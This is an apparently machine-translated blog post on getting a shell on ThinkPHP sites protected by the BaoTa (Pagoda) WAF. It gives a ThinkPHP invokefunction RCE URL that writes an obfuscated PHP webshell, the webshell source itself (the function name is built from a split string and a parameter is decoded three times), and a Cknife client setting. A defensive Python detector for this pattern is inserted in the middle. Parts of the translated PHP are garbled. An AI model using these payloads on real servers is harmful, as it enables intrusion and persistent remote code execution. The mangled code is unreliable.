ThinkPHP: bypassing Pagoda (BaoTa) to getshell

As we can see, the request is blocked outright. Testing shows that the interception here is keyed on the characters of sensitive function names: most of the useful sensitive functions are blocked, and phpinfo() is blocked as well.

 

Emmmm, so what to do...

Executing code directly does not work, so write the code to a file instead, using the file_put_contents() function.

But there is a problem here: a normally written request parameter is blocked just the same for containing sensitive characters, and calls to sensitive functions made through the pony (a small webshell) are blocked too.

 

 

So a bit of black magic is needed as well: a special pony, plus triple URL encoding.

 

 

url:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc);

$ = $ Poc_2 poc_1 [0]. $ Poc_1 [1]. $ Poc_1 [2]. $ Poc_1 [3]. $ Poc_1 [4]. $ Poc_1 [5]; $ poc_2 (UrlDecode (UrlDecode (UrlDecode ($ _ REQUEST [ '12345']))));

?>

pony:

<?php

$poc ="axsxsxexrxt";

$ Poc_1 = explode ( "x" $ bit);

$ = $ Poc_2 poc_1 [0]. $ Poc_1 [1]. $ Poc_1 [2]. $ Poc_1 [3]. $ Poc_1 [4]. $ Poc_1 [5];

$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));

?>

 

The value passed to it must be URL-encoded three times.
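The bypass above works because the filter matches function names in the request as received, while the pony decodes the parameter three more times inside PHP. As an added example (not from the original post), this defender-side check in Python decodes each parameter to a fixed point before matching; the blocklist, rule names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, unquote

# Assumed blocklist for illustration; a production rule set is larger.
SENSITIVE = re.compile(
    r"\b(assert|eval|system|phpinfo|file_put_contents|call_user_func_array)\b", re.I)
PHP_TAG = re.compile(r"<\?php|<\?=", re.I)
INVOKE = re.compile(r"think\\app/invokefunction", re.I)  # route seen in the URL above

def decode_to_fixpoint(value, max_rounds=8):
    """URL-decode repeatedly until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_query(raw_query):
    """Return sorted (parameter, rule) findings for one raw query string."""
    findings = set()
    # parse_qsl performs the first decode, as the web server would.
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        text, extra = decode_to_fixpoint(value)
        if extra >= 1:  # still encoded after the normal single decode
            findings.add((name, "nested-url-encoding"))
        if SENSITIVE.search(text):
            findings.add((name, "sensitive-function"))
        if PHP_TAG.search(text):
            findings.add((name, "php-open-tag"))
        if INVOKE.search(text):
            findings.add((name, "thinkphp-invokefunction"))
    return sorted(findings)

def encode_all(text):
    """Test helper: percent-encode every byte once."""
    return "".join("%%%02X" % b for b in text.encode())

# Constructed sample requests (not captured traffic).
TRIPLE = "12345=" + quote(quote(encode_all("phpinfo();"), safe=""), safe="")
WRITE = ("s=index/think\\app/invokefunction&function=call_user_func_array"
         "&vars[0]=file_put_contents&vars[1][]=12345.php"
         "&vars[1][1]=%3C%3Fphp%20/*%20body%20omitted%20*/%20%3F%3E")
BENIGN = "s=index/index/hello&name=alice%20smith"

if __name__ == "__main__":
    for q in (TRIPLE, WRITE, BENIGN):
        print(inspect_query(q))
```

The split-string function name in the pony body contains no blocklisted token, so the file write is caught here by the PHP open tag and the invokefunction route rather than by name matching.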

 

 

C knife (Cknife) original configuration:

The PHP_MAKE parameter is URL-encoded three times and provided to the request header.

 

 

 

Origin www.cnblogs.com/nul1/p/11863574.html